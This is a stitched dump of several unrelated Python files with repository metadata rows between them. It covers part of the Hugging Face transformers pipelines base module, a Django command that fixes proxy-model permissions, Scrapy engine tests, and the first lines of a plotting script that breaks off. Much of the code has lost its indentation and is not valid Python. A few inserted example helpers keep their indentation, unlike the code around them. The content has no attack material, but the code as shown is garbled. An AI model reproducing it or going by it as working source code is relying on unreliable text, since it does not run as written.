Select framework (TensorFlow or PyTorch) to use from the :obj:`model` passed. Returns a tuple (framework, model).
If :obj:`model` is instantiated, this function will just infer the framework from the model class. Otherwise
:obj:`model` is actually a checkpoint name and this method will try to instantiate it using :obj:`model_classes`.
Since we don't want to instantiate the model twice, this model is returned for use by the pipeline.
If both frameworks are installed and available for :obj:`model`, PyTorch is selected.
Args:
model (:obj:`str`, :class:`~transformers.PreTrainedModel` or :class:`~transformers.TFPreTrainedModel`):
            The model to infer the framework from. If :obj:`str`, a checkpoint name.
config (:class:`~transformers.AutoConfig`):
The config associated with the model to help using the correct class
model_classes (dictionary :obj:`str` to :obj:`type`, `optional`):
A mapping framework to class.
task (:obj:`str`):
The task defining which pipeline will be returned.
model_kwargs:
Additional dictionary of keyword arguments passed along to the model's :obj:`from_pretrained(...,
**model_kwargs)` function.
Returns:
:obj:`Tuple`: A tuple framework, model.
"""
if not is_tf_available() and not is_torch_available():
raise RuntimeError(
"At least one of TensorFlow 2.0 or PyTorch should be installed. "
"To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ "
"To install PyTorch, read the instructions at https://pytorch.org/."
)
if isinstance(model, str):
model_kwargs["_from_pipeline"] = task
class_tuple = ()
look_pt = is_torch_available() and framework in {"pt", None}
look_tf = is_tf_available() and framework in {"tf", None}
if model_classes:
if look_pt:
class_tuple = class_tuple + model_classes.get("pt", (AutoModel,))
if look_tf:
class_tuple = class_tuple + model_classes.get("tf", (TFAutoModel,))
if config.architectures:
classes = []
for architecture in config.architectures:
transformers_module = importlib.import_module("transformers")
if look_pt:
_class = getattr(transformers_module, architecture, None)
if _class is not None:
classes.append(_class)
if look_tf:
_class = getattr(transformers_module, f"TF{architecture}", None)
if _class is not None:
classes.append(_class)
class_tuple = class_tuple + tuple(classes)
if len(class_tuple) == 0:
raise ValueError(f"Pipeline cannot infer suitable model classes from {model}")
for model_class in class_tuple:
kwargs = model_kwargs.copy()
if framework == "pt" and model.endswith(".h5"):
kwargs["from_tf"] = True
logger.warning(
"Model might be a TensorFlow model (ending with `.h5`) but TensorFlow is not available. "
"Trying to load the model with PyTorch."
)
elif framework == "tf" and model.endswith(".bin"):
kwargs["from_pt"] = True
logger.warning(
"Model might be a PyTorch model (ending with `.bin`) but PyTorch is not available. "
"Trying to load the model with Tensorflow."
)
try:
model = model_class.from_pretrained(model, **kwargs)
# Stop loading on the first successful load.
break
except (OSError, ValueError):
continue
if isinstance(model, str):
raise ValueError(f"Could not load model {model} with any of the following classes: {class_tuple}.")
framework = "tf" if model.__class__.__name__.startswith("TF") else "pt"
return framework, model
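# Hedged usage sketch: the checkpoint id "sshleifer/tiny-gpt2" is only an
# example value; any hub id or local path with a loadable config works the same
# way. The helper returns both the resolved framework string and the
# instantiated model, so callers do not have to load the model twice.
def _example_infer_framework_load_model():
    config = AutoConfig.from_pretrained("sshleifer/tiny-gpt2")
    framework, model = infer_framework_load_model("sshleifer/tiny-gpt2", config)
    return framework, type(model).__name__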
def infer_framework_from_model(
model,
model_classes: Optional[Dict[str, Tuple[type]]] = None,
task: Optional[str] = None,
framework: Optional[str] = None,
**model_kwargs
):
"""
Select framework (TensorFlow or PyTorch) to use from the :obj:`model` passed. Returns a tuple (framework, model).
If :obj:`model` is instantiated, this function will just infer the framework from the model class. Otherwise
:obj:`model` is actually a checkpoint name and this method will try to instantiate it using :obj:`model_classes`.
Since we don't want to instantiate the model twice, this model is returned for use by the pipeline.
If both frameworks are installed and available for :obj:`model`, PyTorch is selected.
Args:
model (:obj:`str`, :class:`~transformers.PreTrainedModel` or :class:`~transformers.TFPreTrainedModel`):
            The model to infer the framework from. If :obj:`str`, a checkpoint name.
model_classes (dictionary :obj:`str` to :obj:`type`, `optional`):
A mapping framework to class.
task (:obj:`str`):
The task defining which pipeline will be returned.
model_kwargs:
Additional dictionary of keyword arguments passed along to the model's :obj:`from_pretrained(...,
**model_kwargs)` function.
Returns:
:obj:`Tuple`: A tuple framework, model.
"""
if isinstance(model, str):
config = AutoConfig.from_pretrained(model, _from_pipeline=task, **model_kwargs)
else:
config = model.config
return infer_framework_load_model(
model, config, model_classes=model_classes, _from_pipeline=task, task=task, framework=framework, **model_kwargs
)
def get_framework(model, revision: Optional[str] = None):
"""
Select framework (TensorFlow or PyTorch) to use.
Args:
model (:obj:`str`, :class:`~transformers.PreTrainedModel` or :class:`~transformers.TFPreTrainedModel`):
If both frameworks are installed, picks the one corresponding to the model passed (either a model class or
the model name). If no specific model is provided, defaults to using PyTorch.
"""
warnings.warn(
"`get_framework` is deprecated and will be removed in v5, use `infer_framework_from_model` instead.",
FutureWarning,
)
if not is_tf_available() and not is_torch_available():
raise RuntimeError(
"At least one of TensorFlow 2.0 or PyTorch should be installed. "
"To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ "
"To install PyTorch, read the instructions at https://pytorch.org/."
)
if isinstance(model, str):
if is_torch_available() and not is_tf_available():
model = AutoModel.from_pretrained(model, revision=revision)
elif is_tf_available() and not is_torch_available():
model = TFAutoModel.from_pretrained(model, revision=revision)
else:
try:
model = AutoModel.from_pretrained(model, revision=revision)
except OSError:
model = TFAutoModel.from_pretrained(model, revision=revision)
framework = "tf" if model.__class__.__name__.startswith("TF") else "pt"
return framework
def get_default_model(targeted_task: Dict, framework: Optional[str], task_options: Optional[Any]) -> str:
"""
Select a default model to use for a given task. Defaults to pytorch if ambiguous.
Args:
targeted_task (:obj:`Dict` ):
Dictionary representing the given task, that should contain default models
framework (:obj:`str`, None)
"pt", "tf" or None, representing a specific framework if it was specified, or None if we don't know yet.
task_options (:obj:`Any`, None)
Any further value required by the task to get fully specified, for instance (SRC, TGT) languages for
translation task.
Returns
:obj:`str` The model string representing the default model for this pipeline
"""
if is_torch_available() and not is_tf_available():
framework = "pt"
elif is_tf_available() and not is_torch_available():
framework = "tf"
defaults = targeted_task["default"]
if task_options:
if task_options not in defaults:
raise ValueError(f"The task does not provide any default models for options {task_options}")
default_models = defaults[task_options]["model"]
elif "model" in defaults:
default_models = targeted_task["default"]["model"]
else:
# XXX This error message needs to be updated to be more generic if more tasks are going to become
# parametrized
raise ValueError('The task defaults can\'t be correctly selected. You probably meant "translation_XX_to_YY"')
if framework is None:
framework = "pt"
return default_models[framework]
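# Minimal sketch with a hypothetical task definition (real task entries carry
# more metadata than this stripped-down dict): with no framework and no task
# options, the PyTorch default is returned whenever torch is available.
def _example_get_default_model():
    targeted_task = {"default": {"model": {"pt": "example-pt-checkpoint", "tf": "example-tf-checkpoint"}}}
    return get_default_model(targeted_task, framework=None, task_options=None)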
class PipelineException(Exception):
"""
Raised by a :class:`~transformers.Pipeline` when handling __call__.
Args:
task (:obj:`str`): The task of the pipeline.
model (:obj:`str`): The model used by the pipeline.
reason (:obj:`str`): The error message to display.
"""
def __init__(self, task: str, model: str, reason: str):
super().__init__(reason)
self.task = task
self.model = model
class ArgumentHandler(ABC):
"""
Base interface for handling arguments for each :class:`~transformers.pipelines.Pipeline`.
"""
@abstractmethod
def __call__(self, *args, **kwargs):
raise NotImplementedError()
class PipelineDataFormat:
"""
    Base class for all the pipeline supported data formats, both for reading and writing. Supported data formats
    currently include:
- JSON
- CSV
- stdin/stdout (pipe)
:obj:`PipelineDataFormat` also includes some utilities to work with multi-columns like mapping from datasets
columns to pipelines keyword arguments through the :obj:`dataset_kwarg_1=dataset_column_1` format.
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
SUPPORTED_FORMATS = ["json", "csv", "pipe"]
def __init__(
self,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite: bool = False,
):
self.output_path = output_path
self.input_path = input_path
self.column = column.split(",") if column is not None else [""]
self.is_multi_columns = len(self.column) > 1
if self.is_multi_columns:
self.column = [tuple(c.split("=")) if "=" in c else (c, c) for c in self.column]
if output_path is not None and not overwrite:
if exists(abspath(self.output_path)):
raise OSError(f"{self.output_path} already exists on disk")
if input_path is not None:
if not exists(abspath(self.input_path)):
                raise OSError(f"{self.input_path} doesn't exist on disk")
@abstractmethod
def __iter__(self):
raise NotImplementedError()
@abstractmethod
def save(self, data: Union[dict, List[dict]]):
"""
Save the provided data object with the representation for the current
:class:`~transformers.pipelines.PipelineDataFormat`.
Args:
data (:obj:`dict` or list of :obj:`dict`): The data to store.
"""
raise NotImplementedError()
def save_binary(self, data: Union[dict, List[dict]]) -> str:
"""
Save the provided data object as a pickle-formatted binary data on the disk.
Args:
data (:obj:`dict` or list of :obj:`dict`): The data to store.
Returns:
:obj:`str`: Path where the data has been saved.
"""
path, _ = os.path.splitext(self.output_path)
binary_path = os.path.extsep.join((path, "pickle"))
with open(binary_path, "wb+") as f_output:
pickle.dump(data, f_output)
return binary_path
@staticmethod
def from_str(
format: str,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite=False,
) -> "PipelineDataFormat":
"""
Creates an instance of the right subclass of :class:`~transformers.pipelines.PipelineDataFormat` depending on
:obj:`format`.
Args:
format: (:obj:`str`):
The format of the desired pipeline. Acceptable values are :obj:`"json"`, :obj:`"csv"` or :obj:`"pipe"`.
output_path (:obj:`str`, `optional`):
Where to save the outgoing data.
input_path (:obj:`str`, `optional`):
Where to look for the input data.
column (:obj:`str`, `optional`):
The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
Returns:
:class:`~transformers.pipelines.PipelineDataFormat`: The proper data format.
"""
if format == "json":
return JsonPipelineDataFormat(output_path, input_path, column, overwrite=overwrite)
elif format == "csv":
return CsvPipelineDataFormat(output_path, input_path, column, overwrite=overwrite)
elif format == "pipe":
return PipedPipelineDataFormat(output_path, input_path, column, overwrite=overwrite)
else:
            raise KeyError(f"Unknown reader {format} (Available readers are json/csv/pipe)")
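# Hedged example: the output file name is a placeholder and no input file is
# opened for the CSV variant at construction time. It shows how the factory
# maps a format string onto the matching subclass.
def _example_pipeline_data_format_factory():
    fmt = PipelineDataFormat.from_str(
        "csv", output_path="example_out.csv", input_path=None, column="text", overwrite=True
    )
    return type(fmt).__name__  # "CsvPipelineDataFormat"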
class CsvPipelineDataFormat(PipelineDataFormat):
"""
Support for pipelines using CSV data format.
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
def __init__(
self,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite=False,
):
super().__init__(output_path, input_path, column, overwrite=overwrite)
def __iter__(self):
with open(self.input_path, "r") as f:
reader = csv.DictReader(f)
for row in reader:
if self.is_multi_columns:
yield {k: row[c] for k, c in self.column}
else:
yield row[self.column[0]]
def save(self, data: List[dict]):
"""
Save the provided data object with the representation for the current
:class:`~transformers.pipelines.PipelineDataFormat`.
Args:
data (:obj:`List[dict]`): The data to store.
"""
with open(self.output_path, "w") as f:
if len(data) > 0:
writer = csv.DictWriter(f, list(data[0].keys()))
writer.writeheader()
writer.writerows(data)
class JsonPipelineDataFormat(PipelineDataFormat):
"""
Support for pipelines using JSON file format.
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
def __init__(
self,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite=False,
):
super().__init__(output_path, input_path, column, overwrite=overwrite)
with open(input_path, "r") as f:
self._entries = json.load(f)
def __iter__(self):
for entry in self._entries:
if self.is_multi_columns:
yield {k: entry[c] for k, c in self.column}
else:
yield entry[self.column[0]]
def save(self, data: dict):
"""
Save the provided data object in a json file.
Args:
data (:obj:`dict`): The data to store.
"""
with open(self.output_path, "w") as f:
json.dump(data, f)
class PipedPipelineDataFormat(PipelineDataFormat):
"""
    Read data from piped input to the python process. For multi-column data, columns should be separated by \t
If columns are provided, then the output will be a dictionary with {column_x: value_x}
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
def __iter__(self):
for line in sys.stdin:
# Split for multi-columns
if "\t" in line:
line = line.split("\t")
if self.column:
# Dictionary to map arguments
yield {kwargs: l for (kwargs, _), l in zip(self.column, line)}
else:
yield tuple(line)
# No dictionary to map arguments
else:
yield line
def save(self, data: dict):
"""
Print the data.
Args:
data (:obj:`dict`): The data to store.
"""
print(data)
def save_binary(self, data: Union[dict, List[dict]]) -> str:
if self.output_path is None:
            raise KeyError(
                "Piped input on a pipeline that outputs large objects requires an output file path. "
                "Please provide such an output path through the --output argument."
)
return super().save_binary(data)
class _ScikitCompat(ABC):
"""
Interface layer for the Scikit and Keras compatibility.
"""
@abstractmethod
def transform(self, X):
raise NotImplementedError()
@abstractmethod
def predict(self, X):
raise NotImplementedError()
PIPELINE_INIT_ARGS = r"""
Arguments:
model (:obj:`~transformers.PreTrainedModel` or :obj:`~transformers.TFPreTrainedModel`):
The model that will be used by the pipeline to make predictions. This needs to be a model inheriting from
:class:`~transformers.PreTrainedModel` for PyTorch and :class:`~transformers.TFPreTrainedModel` for
TensorFlow.
tokenizer (:obj:`~transformers.PreTrainedTokenizer`):
The tokenizer that will be used by the pipeline to encode data for the model. This object inherits from
:class:`~transformers.PreTrainedTokenizer`.
modelcard (:obj:`str` or :class:`~transformers.ModelCard`, `optional`):
Model card attributed to the model for this pipeline.
framework (:obj:`str`, `optional`):
The framework to use, either :obj:`"pt"` for PyTorch or :obj:`"tf"` for TensorFlow. The specified framework
must be installed.
If no framework is specified, will default to the one currently installed. If no framework is specified and
both frameworks are installed, will default to the framework of the :obj:`model`, or to PyTorch if no model
is provided.
task (:obj:`str`, defaults to :obj:`""`):
A task-identifier for the pipeline.
args_parser (:class:`~transformers.pipelines.ArgumentHandler`, `optional`):
Reference to the object in charge of parsing supplied pipeline parameters.
device (:obj:`int`, `optional`, defaults to -1):
            Device ordinal for CPU/GPU support. Setting this to -1 will leverage the CPU, a positive integer will run the model on
the associated CUDA device id.
binary_output (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Flag indicating if the output of the pipeline should happen in a binary format (i.e., pickle) or as raw text.
"""
@add_end_docstrings(PIPELINE_INIT_ARGS)
class Pipeline(_ScikitCompat):
"""
The Pipeline class is the class from which all pipelines inherit. Refer to this class for methods shared across
different pipelines.
Base class implementing pipelined operations. Pipeline workflow is defined as a sequence of the following
operations:
Input -> Tokenization -> Model Inference -> Post-Processing (task dependent) -> Output
Pipeline supports running on CPU or GPU through the device argument (see below).
    Some pipelines, for instance :class:`~transformers.FeatureExtractionPipeline` (:obj:`'feature-extraction'`),
    output large tensor objects as nested-lists. In order to avoid dumping such large structures as textual data we
provide the :obj:`binary_output` constructor argument. If set to :obj:`True`, the output will be stored in the
pickle format.
"""
default_input_names = None
def __init__(
self,
model: Union["PreTrainedModel", "TFPreTrainedModel"],
tokenizer: Optional[PreTrainedTokenizer] = None,
feature_extractor: Optional[PreTrainedFeatureExtractor] = None,
modelcard: Optional[ModelCard] = None,
framework: Optional[str] = None,
task: str = "",
args_parser: ArgumentHandler = None,
device: int = -1,
binary_output: bool = False,
):
if framework is None:
framework, model = infer_framework_load_model(model, config=model.config)
self.task = task
self.model = model
self.tokenizer = tokenizer
self.feature_extractor = feature_extractor
self.modelcard = modelcard
self.framework = framework
self.device = device if framework == "tf" else torch.device("cpu" if device < 0 else f"cuda:{device}")
self.binary_output = binary_output
# Special handling
if self.framework == "pt" and self.device.type == "cuda":
self.model = self.model.to(self.device)
# Update config with task specific parameters
task_specific_params = self.model.config.task_specific_params
if task_specific_params is not None and task in task_specific_params:
self.model.config.update(task_specific_params.get(task))
def save_pretrained(self, save_directory: str):
"""
Save the pipeline's model and tokenizer.
Args:
save_directory (:obj:`str`):
                A path to the directory in which to save. It will be created if it doesn't exist.
"""
if os.path.isfile(save_directory):
logger.error(f"Provided path ({save_directory}) should be a directory, not a file")
return
os.makedirs(save_directory, exist_ok=True)
self.model.save_pretrained(save_directory)
if self.tokenizer is not None:
self.tokenizer.save_pretrained(save_directory)
if self.feature_extractor is not None:
self.feature_extractor.save_pretrained(save_directory)
if self.modelcard is not None:
self.modelcard.save_pretrained(save_directory)
def transform(self, X):
"""
Scikit / Keras interface to transformers' pipelines. This method will forward to __call__().
"""
return self(X=X)
def predict(self, X):
"""
Scikit / Keras interface to transformers' pipelines. This method will forward to __call__().
"""
return self(X=X)
@contextmanager
def device_placement(self):
"""
        Context manager allowing tensor allocation on the user-specified device in a framework-agnostic way.
Returns:
Context manager
Examples::
# Explicitly ask for tensor allocation on CUDA device :0
pipe = pipeline(..., device=0)
with pipe.device_placement():
# Every framework specific tensor allocation will be done on the request device
output = pipe(...)
"""
if self.framework == "tf":
with tf.device("/CPU:0" if self.device == -1 else f"/device:GPU:{self.device}"):
yield
else:
if self.device.type == "cuda":
torch.cuda.set_device(self.device)
yield
def ensure_tensor_on_device(self, **inputs):
"""
Ensure PyTorch tensors are on the specified device.
Args:
inputs (keyword arguments that should be :obj:`torch.Tensor`): The tensors to place on :obj:`self.device`.
Return:
:obj:`Dict[str, torch.Tensor]`: The same as :obj:`inputs` but on the proper device.
"""
return {
name: tensor.to(self.device) if isinstance(tensor, torch.Tensor) else tensor
for name, tensor in inputs.items()
}
def check_model_type(self, supported_models: Union[List[str], dict]):
"""
        Check if the model class is supported by the pipeline.
Args:
supported_models (:obj:`List[str]` or :obj:`dict`):
The list of models supported by the pipeline, or a dictionary with model class values.
"""
if not isinstance(supported_models, list): # Create from a model mapping
supported_models_names = []
for config, model in supported_models.items():
# Mapping can now contain tuples of models for the same configuration.
if isinstance(model, tuple):
supported_models_names.extend([_model.__name__ for _model in model])
else:
supported_models_names.append(model.__name__)
supported_models = supported_models_names
if self.model.__class__.__name__ not in supported_models:
raise PipelineException(
self.task,
self.model.base_model_prefix,
f"The model '{self.model.__class__.__name__}' is not supported for {self.task}. Supported models are {supported_models}",
)
def _parse_and_tokenize(
self, inputs, padding=True, add_special_tokens=True, truncation=TruncationStrategy.DO_NOT_TRUNCATE, **kwargs
):
"""
Parse arguments and tokenize
"""
# Parse arguments
inputs = self.tokenizer(
inputs,
add_special_tokens=add_special_tokens,
return_tensors=self.framework,
padding=padding,
truncation=truncation,
)
return inputs
def __call__(self, *args, **kwargs):
inputs = self._parse_and_tokenize(*args, **kwargs)
return self._forward(inputs)
def _forward(self, inputs, return_tensors=False):
"""
Internal framework specific forward dispatching
Args:
            inputs: dict holding all the keyword arguments required by the model forward method.
return_tensors: Whether to return native framework (pt/tf) tensors rather than numpy array
Returns:
Numpy array
"""
# Encode for forward
with self.device_placement():
if self.framework == "tf":
# TODO trace model
predictions = self.model(inputs.data, training=False)[0]
else:
with torch.no_grad():
inputs = self.ensure_tensor_on_device(**inputs)
predictions = self.model(**inputs)[0].cpu()
if return_tensors:
return predictions
else:
return predictions.numpy()
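# End-to-end usage sketch. Assumptions: the `pipeline` factory is imported from
# the top-level package (it lives outside this module), and "sentiment-analysis"
# together with the default checkpoint it downloads are example choices only.
def _example_pipeline_usage():
    from transformers import pipeline
    classifier = pipeline("sentiment-analysis")
    return classifier("Pipelines wrap tokenization, inference and post-processing.")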
| apache-2.0 | 8,440,981,556,735,697,000 | 37.477764 | 137 | 0.613665 | false |
sha-red/django-shared-utils | shared/utils/management/commands/fix_proxymodel_permissions.py | 1 | 1509 | # -*- coding: utf-8 -*-
"""Add permissions for proxy model.
This is needed because of the bug https://code.djangoproject.com/ticket/11154
in Django (as of 1.6, it's not fixed).
When a permission is created for a proxy model, it actually creates it for its
base model's app_label (e.g. for "article" instead of "about", for the About proxy
model).
What we need, however, is that the permission be created for the proxy model
itself, in order to have the proper entries displayed in the admin.
Source: https://gist.github.com/magopian/7543724
"""
import sys
from django.apps import apps
from django.contrib.auth.management import _get_all_permissions
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Fix permissions for proxy models."
def handle(self, *args, **options):
for model in apps.get_models():
opts = model._meta
ctype, created = ContentType.objects.get_or_create(
app_label=opts.app_label,
model=opts.object_name.lower())
for codename, name in _get_all_permissions(opts):
p, created = Permission.objects.get_or_create(
codename=codename,
content_type=ctype,
defaults={'name': name})
if created:
sys.stdout.write('Adding permission {}\n'.format(p))
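# Hedged usage note: with the app that ships this command listed in
# INSTALLED_APPS, the fix is applied with
#
#     python manage.py fix_proxymodel_permissions
#
# after which each proxy model's permissions hang off a content type keyed on
# the proxy model's own app_label rather than the concrete base model's.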
| mit | 2,577,458,159,359,952,400 | 34.093023 | 79 | 0.664016 | false |
wujuguang/scrapy | tests/test_engine.py | 1 | 11123 | """
Scrapy engine tests
This starts a testing web server (using twisted.server.Site) and then crawls it
with the Scrapy crawler.
To view the testing web server in a browser you can start it by running this
module with the ``runserver`` argument::
python test_engine.py runserver
"""
from __future__ import print_function
import sys, os, re
from six.moves.urllib.parse import urlparse
from twisted.internet import reactor, defer
from twisted.web import server, static, util
from twisted.trial import unittest
from scrapy import signals
from scrapy.core.engine import ExecutionEngine
from scrapy.utils.test import get_crawler
from pydispatch import dispatcher
from tests import tests_datadir
from scrapy.spiders import Spider
from scrapy.item import Item, Field
from scrapy.linkextractors import LinkExtractor
from scrapy.http import Request
from scrapy.utils.signal import disconnect_all
class TestItem(Item):
name = Field()
url = Field()
price = Field()
class TestSpider(Spider):
name = "scrapytest.org"
allowed_domains = ["scrapytest.org", "localhost"]
itemurl_re = re.compile(r"item\d+.html")
name_re = re.compile(r"<h1>(.*?)</h1>", re.M)
price_re = re.compile(r">Price: \$(.*?)<", re.M)
item_cls = TestItem
def parse(self, response):
xlink = LinkExtractor()
itemre = re.compile(self.itemurl_re)
for link in xlink.extract_links(response):
if itemre.search(link.url):
yield Request(url=link.url, callback=self.parse_item)
def parse_item(self, response):
item = self.item_cls()
m = self.name_re.search(response.text)
if m:
item['name'] = m.group(1)
item['url'] = response.url
m = self.price_re.search(response.text)
if m:
item['price'] = m.group(1)
return item
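# Quick illustration (not used by the tests themselves) of the regular
# expressions TestSpider scrapes item pages with; the HTML snippet is made up.
def _example_testspider_regexes():
    html = "<h1>Item 1 name</h1><p>Price: $100</p>"
    name = TestSpider.name_re.search(html).group(1)
    price = TestSpider.price_re.search(html).group(1)
    return name, price  # ("Item 1 name", "100")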
class TestDupeFilterSpider(TestSpider):
def start_requests(self):
return (Request(url) for url in self.start_urls) # no dont_filter=True
class DictItemsSpider(TestSpider):
item_cls = dict
class ItemZeroDivisionErrorSpider(TestSpider):
custom_settings = {
"ITEM_PIPELINES": {
"tests.pipelines.ProcessWithZeroDivisionErrorPipiline": 300,
}
}
def start_test_site(debug=False):
root_dir = os.path.join(tests_datadir, "test_site")
r = static.File(root_dir)
r.putChild(b"redirect", util.Redirect(b"/redirected"))
r.putChild(b"redirected", static.Data(b"Redirected here", "text/plain"))
port = reactor.listenTCP(0, server.Site(r), interface="127.0.0.1")
if debug:
print("Test server running at http://localhost:%d/ - hit Ctrl-C to finish." \
% port.getHost().port)
return port
class CrawlerRun(object):
    """A class to run the crawler and keep track of the events that occurred"""
def __init__(self, spider_class):
self.spider = None
self.respplug = []
self.reqplug = []
self.reqdropped = []
self.reqreached = []
self.itemerror = []
self.itemresp = []
self.signals_catched = {}
self.spider_class = spider_class
def run(self):
self.port = start_test_site()
self.portno = self.port.getHost().port
start_urls = [self.geturl("/"), self.geturl("/redirect"),
self.geturl("/redirect")] # a duplicate
for name, signal in vars(signals).items():
if not name.startswith('_'):
dispatcher.connect(self.record_signal, signal)
self.crawler = get_crawler(self.spider_class)
self.crawler.signals.connect(self.item_scraped, signals.item_scraped)
self.crawler.signals.connect(self.item_error, signals.item_error)
self.crawler.signals.connect(self.request_scheduled, signals.request_scheduled)
self.crawler.signals.connect(self.request_dropped, signals.request_dropped)
self.crawler.signals.connect(self.request_reached, signals.request_reached_downloader)
self.crawler.signals.connect(self.response_downloaded, signals.response_downloaded)
self.crawler.crawl(start_urls=start_urls)
self.spider = self.crawler.spider
self.deferred = defer.Deferred()
dispatcher.connect(self.stop, signals.engine_stopped)
return self.deferred
def stop(self):
self.port.stopListening()
for name, signal in vars(signals).items():
if not name.startswith('_'):
disconnect_all(signal)
self.deferred.callback(None)
def geturl(self, path):
return "http://localhost:%s%s" % (self.portno, path)
def getpath(self, url):
u = urlparse(url)
return u.path
def item_error(self, item, response, spider, failure):
self.itemerror.append((item, response, spider, failure))
def item_scraped(self, item, spider, response):
self.itemresp.append((item, response))
def request_scheduled(self, request, spider):
self.reqplug.append((request, spider))
def request_reached(self, request, spider):
self.reqreached.append((request, spider))
def request_dropped(self, request, spider):
self.reqdropped.append((request, spider))
def response_downloaded(self, response, spider):
self.respplug.append((response, spider))
def record_signal(self, *args, **kwargs):
"""Record a signal and its parameters"""
signalargs = kwargs.copy()
sig = signalargs.pop('signal')
signalargs.pop('sender', None)
self.signals_catched[sig] = signalargs
class EngineTest(unittest.TestCase):
@defer.inlineCallbacks
def test_crawler(self):
for spider in TestSpider, DictItemsSpider:
self.run = CrawlerRun(spider)
yield self.run.run()
self._assert_visited_urls()
self._assert_scheduled_requests(urls_to_visit=8)
self._assert_downloaded_responses()
self._assert_scraped_items()
self._assert_signals_catched()
self.run = CrawlerRun(TestDupeFilterSpider)
yield self.run.run()
self._assert_scheduled_requests(urls_to_visit=7)
self._assert_dropped_requests()
self.run = CrawlerRun(ItemZeroDivisionErrorSpider)
yield self.run.run()
self._assert_items_error()
def _assert_visited_urls(self):
must_be_visited = ["/", "/redirect", "/redirected",
"/item1.html", "/item2.html", "/item999.html"]
urls_visited = set([rp[0].url for rp in self.run.respplug])
urls_expected = set([self.run.geturl(p) for p in must_be_visited])
assert urls_expected <= urls_visited, "URLs not visited: %s" % list(urls_expected - urls_visited)
def _assert_scheduled_requests(self, urls_to_visit=None):
self.assertEqual(urls_to_visit, len(self.run.reqplug))
paths_expected = ['/item999.html', '/item2.html', '/item1.html']
urls_requested = set([rq[0].url for rq in self.run.reqplug])
urls_expected = set([self.run.geturl(p) for p in paths_expected])
assert urls_expected <= urls_requested
scheduled_requests_count = len(self.run.reqplug)
dropped_requests_count = len(self.run.reqdropped)
responses_count = len(self.run.respplug)
self.assertEqual(scheduled_requests_count,
dropped_requests_count + responses_count)
self.assertEqual(len(self.run.reqreached),
responses_count)
def _assert_dropped_requests(self):
self.assertEqual(len(self.run.reqdropped), 1)
def _assert_downloaded_responses(self):
# response tests
self.assertEqual(8, len(self.run.respplug))
self.assertEqual(8, len(self.run.reqreached))
for response, _ in self.run.respplug:
if self.run.getpath(response.url) == '/item999.html':
self.assertEqual(404, response.status)
if self.run.getpath(response.url) == '/redirect':
self.assertEqual(302, response.status)
def _assert_items_error(self):
self.assertEqual(2, len(self.run.itemerror))
for item, response, spider, failure in self.run.itemerror:
self.assertEqual(failure.value.__class__, ZeroDivisionError)
self.assertEqual(spider, self.run.spider)
self.assertEqual(item['url'], response.url)
if 'item1.html' in item['url']:
self.assertEqual('Item 1 name', item['name'])
self.assertEqual('100', item['price'])
if 'item2.html' in item['url']:
self.assertEqual('Item 2 name', item['name'])
self.assertEqual('200', item['price'])
def _assert_scraped_items(self):
self.assertEqual(2, len(self.run.itemresp))
for item, response in self.run.itemresp:
self.assertEqual(item['url'], response.url)
if 'item1.html' in item['url']:
self.assertEqual('Item 1 name', item['name'])
self.assertEqual('100', item['price'])
if 'item2.html' in item['url']:
self.assertEqual('Item 2 name', item['name'])
self.assertEqual('200', item['price'])
def _assert_signals_catched(self):
assert signals.engine_started in self.run.signals_catched
assert signals.engine_stopped in self.run.signals_catched
assert signals.spider_opened in self.run.signals_catched
assert signals.spider_idle in self.run.signals_catched
assert signals.spider_closed in self.run.signals_catched
self.assertEqual({'spider': self.run.spider},
self.run.signals_catched[signals.spider_opened])
self.assertEqual({'spider': self.run.spider},
self.run.signals_catched[signals.spider_idle])
self.run.signals_catched[signals.spider_closed].pop('spider_stats', None) # XXX: remove for scrapy 0.17
self.assertEqual({'spider': self.run.spider, 'reason': 'finished'},
self.run.signals_catched[signals.spider_closed])
@defer.inlineCallbacks
def test_close_downloader(self):
e = ExecutionEngine(get_crawler(TestSpider), lambda _: None)
yield e.close()
@defer.inlineCallbacks
def test_close_spiders_downloader(self):
e = ExecutionEngine(get_crawler(TestSpider), lambda _: None)
yield e.open_spider(TestSpider(), [])
self.assertEqual(len(e.open_spiders), 1)
yield e.close()
self.assertEqual(len(e.open_spiders), 0)
@defer.inlineCallbacks
def test_close_engine_spiders_downloader(self):
e = ExecutionEngine(get_crawler(TestSpider), lambda _: None)
yield e.open_spider(TestSpider(), [])
e.start()
self.assertTrue(e.running)
yield e.close()
self.assertFalse(e.running)
self.assertEqual(len(e.open_spiders), 0)
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == 'runserver':
start_test_site(debug=True)
reactor.run()
| bsd-3-clause | 556,884,160,656,988,860 | 35.588816 | 111 | 0.632383 | false |
BorisJeremic/Real-ESSI-Examples | analytic_solution/test_cases/Contact/Static_Normal_Contact/Normal_Behviour/SoftContact_NonLinHardSoftShear/plot.py | 1 | 1585 | #!/usr/bin/python
import h5py
